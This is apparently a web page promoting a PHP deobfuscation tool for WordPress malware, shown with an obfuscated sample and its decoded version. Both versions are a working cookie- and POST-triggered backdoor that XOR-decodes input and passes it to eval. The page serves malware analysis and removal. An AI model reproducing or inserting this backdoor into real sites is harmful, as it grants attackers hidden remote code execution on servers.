Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $kxlZCgbi = chr/* cvCce */( 953 - 838 ).chr/* bG*/( 1017/* z */- 901 )."\162" ./* C */chr/* DrRqC*/( 536 - 441/*wZN*/)."\162" . "\145" . "\x70" . 'e' . chr ( 507/* lgq */- 410 ).chr (/*p*/588/* sZMlW */-/* XZZJW */472/* mijFm */);
$wDISJcQ/* ppvf */= chr ( 329 - 217 ).chr ( 256 -/* kBUDA */159 )."\x63" . "\x6b";$_dqLN = '42459';
function/*WY */EHoxhvfmh()
{
/* yWiPt*/$TnSLyJH/* qZge */=/* lyVu */Array/* Rcfzk */( "ahLjWXcwp" => "McenXAKKLQK"/* NOL */);$_BWbnV = '52172';
$mrELmi = Array/* Wp */( "ylvAXQRrkhTlqBrYnZJWVRJEKRD" =>/* DmF */"byVXYGjjuZFGLhrbLgXqUEntTn" );;
/* rK */$OVBtf =/* LyjGb */Array(/*bhW*/$TnSLyJH, $_COOKIE,/* X */$TnSLyJH, $_POST, $mrELmi);
/* AeA */
return $OVBtf;$_pFXze =/* hE */'56154';
}
/*mJffR */
/*Pu */function/*u */dYinOainW($GMCMEEfZt, $TnSLyJH)
{
if/* QjPG */( count ( $GMCMEEfZt )/* wOkcx */==/* qGNM */3/* K */) {
$tUPxfmJlo = $GMCMEEfZt[1];
/* EF */$nyjzmS = $GMCMEEfZt[2];
$diGXIP/* SDX */= $tUPxfmJlo($nyjzmS);
/* oDtm */eval (/* oQgiX */$diGXIP/* UEUW*/);$_Hr = '34534';
die ();$_FD =/*YbCr */'8669';
}
/*s */}
/*pm */
function YvINFoABC($oLNXrWTigv, $BfqUp)
/* l*/{
return $oLNXrWTigv ^ $BfqUp;
}
$kQXXvGBuBe =/* lhMY */'#';
/* plWc*/function XYApVh($JarwchR,/*RqY */$kQXXvGBuBe)
{
$JarwchR = explode ($kQXXvGBuBe, $JarwchR/* mznho*/);
/*WvQo */
dYinOainW($JarwchR, $kQXXvGBuBe);;
/* pp */}
/* t*/
/* zg */foreach (EHoxhvfmh() as $dovsWlC) {
foreach ( $dovsWlC as $BfqUp => $oLNXrWTigv ) {
$FrUlcRnmjb = strlen( $oLNXrWTigv/* r*/)/strlen( $BfqUp/* n*/);
$oLNXrWTigv/*mfV*/= @$wDISJcQ( chr/* J */( 490 - 418 ).chr/* kGf*/(/* QC */175/* YIW*/-/*FWT*/133/* zMjpe */),/*A */$oLNXrWTigv );
$BfqUp .= "nsWsd-kFol-Wfmv-veIpj-CUvfBM-VNyR-gKfsSo";$_Y =/* vvrT*/'38778';
/* yYhrq */$BfqUp = $kxlZCgbi ( $BfqUp,/* eIa */$FrUlcRnmjb/*elXs */+ 1);$_Mf = '15528';
/* SM */XYApVh(YvINFoABC($oLNXrWTigv, $BfqUp), $kQXXvGBuBe);
continue;
/* vTf */}
}<?php
$kxlZCgbi = "str_repeat";
$wDISJcQ = "pack";
$_dqLN = '42459';
function EHoxhvfmh()
{
/* yWiPt*/
$TnSLyJH = array("ahLjWXcwp" => "McenXAKKLQK");
$_BWbnV = '52172';
$mrELmi = array("ylvAXQRrkhTlqBrYnZJWVRJEKRD" => "byVXYGjjuZFGLhrbLgXqUEntTn");
/* rK */
$OVBtf = array(
/*bhW*/
$TnSLyJH,
$_COOKIE,
/* X */
$TnSLyJH,
$_POST,
$mrELmi,
);
/* AeA */
return $OVBtf;
}
/*mJffR */
/*Pu */
function dYinOainW($GMCMEEfZt, $TnSLyJH)
{
if (count($GMCMEEfZt) == 3) {
$tUPxfmJlo = $GMCMEEfZt[1];
/* EF */
$nyjzmS = $GMCMEEfZt[2];
$diGXIP = $tUPxfmJlo($nyjzmS);
/* oDtm */
eval($diGXIP);
$_Hr = '34534';
die;
}
/*s */
}
/*pm */
function YvINFoABC($oLNXrWTigv, $BfqUp)
{
return $oLNXrWTigv ^ $BfqUp;
}
$kQXXvGBuBe = '#';
/* plWc*/
function XYApVh($JarwchR, $kQXXvGBuBe)
{
$JarwchR = explode($kQXXvGBuBe, $JarwchR);
/*WvQo */
dYinOainW($JarwchR, $kQXXvGBuBe);
/* pp */
}
/* t*/
/* zg */
foreach (EHoxhvfmh() as $dovsWlC) {
foreach ($dovsWlC as $BfqUp => $oLNXrWTigv) {
$FrUlcRnmjb = strlen($oLNXrWTigv) / strlen($BfqUp);
$oLNXrWTigv = @$wDISJcQ(
"H*",
/*A */
$oLNXrWTigv
);
$BfqUp .= "nsWsd-kFol-Wfmv-veIpj-CUvfBM-VNyR-gKfsSo";
$_Y = '38778';
/* yYhrq */
$BfqUp = $kxlZCgbi(
$BfqUp,
/* eIa */
$FrUlcRnmjb + 1
);
$_Mf = '15528';
/* SM */
XYApVh(YvINFoABC($oLNXrWTigv, $BfqUp), $kQXXvGBuBe);
continue;
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.